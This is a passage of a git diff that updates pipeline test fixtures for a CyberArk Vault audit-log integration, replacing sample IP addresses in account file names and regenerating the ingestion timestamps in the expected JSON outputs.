11.7.0000\n 107\n Delete File Category\n Info\n Administrator\n Delete File Category\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 127.0.0.1\n \n LastFailDate\n \n Old Value=[1615803137]\n \n Delete File Category\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:24","IsoTimestamp":"2021-03-15T10:22:24Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"107","Desc":"Delete File Category","Severity":"Info","Issuer":"Administrator","Action":"Delete File Category","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"127.0.0.1","Location":"","Category":"LastFailDate","RequestId":"","Reason":"Old Value=[1615803137]","ExtraDetails":"","Message":"Delete File Category","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-15T10:22:24Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:24\n 2021-03-15T10:22:24Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 107\n Delete File Category\n Info\n Administrator\n Delete File Category\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 127.0.0.1\n \n LastFailDate\n \n Old Value=[1615803137]\n \n Delete File Category\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:24","IsoTimestamp":"2021-03-15T10:22:24Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"107","Desc":"Delete File Category","Severity":"Info","Issuer":"Administrator","Action":"Delete File Category","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"127.0.0.1","Location":"","Category":"LastFailDate","RequestId":"","Reason":"Old Value=[1615803137]","ExtraDetails":"","Message":"Delete File Category","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json index 3a9fc16e78a..0ceb6fe61d6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json @@ -28,7 +28,7 @@ }, "@timestamp": "2021-03-15T10:22:24.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -45,11 +45,11 @@ "reason": "Old Value=[1615803137]", "iso_timestamp": "2021-03-15T10:22:24Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e107\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e107\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Delete File Category", "issuer": "Administrator", "rfc5424": true, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "127.0.0.1", "action": "Delete File Category", @@ -64,8 +64,8 @@ "event": { "severity": 2, "action": "delete file category", - "ingested": "2021-06-09T10:24:28.339321900Z", - "original": "\u003c5\u003e1 2021-03-15T10:22:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e107\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:24\",\"IsoTimestamp\":\"2021-03-15T10:22:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"107\",\"Desc\":\"Delete File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"LastFailDate\",\"RequestId\":\"\",\"Reason\":\"Old Value=[1615803137]\",\"ExtraDetails\":\"\",\"Message\":\"Delete File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:37.089518600Z", + "original": "\u003c5\u003e1 2021-03-15T10:22:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e107\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:24\",\"IsoTimestamp\":\"2021-03-15T10:22:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"107\",\"Desc\":\"Delete File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"LastFailDate\",\"RequestId\":\"\",\"Reason\":\"Old Value=[1615803137]\",\"ExtraDetails\":\"\",\"Message\":\"Delete File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "107", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log index b3191445d81..14e3f7ea832 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log @@ -1 +1 @@ -<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 124\n Rename File\n Info\n Administrator\n Rename File\n \n \n PSM\n Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"124","Desc":"Rename File","Severity":"Info","Issuer":"Administrator","Action":"Rename File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 124\n Rename File\n Info\n Administrator\n Rename File\n \n \n PSM\n Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"124","Desc":"Rename File","Severity":"Info","Issuer":"Administrator","Action":"Rename File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json index 8660e0bf904..e7077e28818 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json @@ -28,7 +28,7 @@ }, "@timestamp": "2021-03-14T13:42:20.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect" }, "ecs": { "version": "1.12.0" @@ -44,11 +44,11 @@ "severity": "Info", "iso_timestamp": "2021-03-14T13:42:20Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e124\u003c/MessageID\u003e\n \u003cDesc\u003eRename File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRename File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRename File\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e124\u003c/MessageID\u003e\n \u003cDesc\u003eRename File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRename File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRename File\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Rename File", "issuer": "Administrator", "rfc5424": true, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-PSMConnect", "safe": "PSM", "station": "127.0.0.1", "action": "Rename File", @@ -62,8 +62,8 @@ "event": { "severity": 2, "action": "rename file", - "ingested": "2021-06-09T10:24:28.383885400Z", - "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e124\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"124\",\"Desc\":\"Rename File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:37.213140700Z", + "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e124\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"124\",\"Desc\":\"Rename File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "124", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log index d9c83a42d98..0fcaa02b4dd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log @@ -1 +1 @@ -<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-34.71.250.247-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-34.71.250.247-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 125\n Rename File (Cont.)\n Info\n Administrator\n Rename File (Cont.)\n \n \n PSM\n Operating System-UnixSSH-67.43.156.15-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File (Cont.)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"125","Desc":"Rename File (Cont.)","Severity":"Info","Issuer":"Administrator","Action":"Rename File (Cont.)","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Operating System-UnixSSH-67.43.156.15-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File (Cont.)","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json index dcbae6e4f57..7cac419a9fb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json @@ -28,7 +28,7 @@ }, "@timestamp": "2021-03-14T13:42:20.000Z", "file": { - "path": "Operating System-UnixSSH-34.71.250.247-PSMConnect" + "path": "Operating System-UnixSSH-67.43.156.15-PSMConnect" }, "ecs": { "version": "1.12.0" @@ -44,11 +44,11 @@ "severity": "Info", "iso_timestamp": "2021-03-14T13:42:20Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e125\u003c/MessageID\u003e\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eOperating System-UnixSSH-34.71.250.247-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n 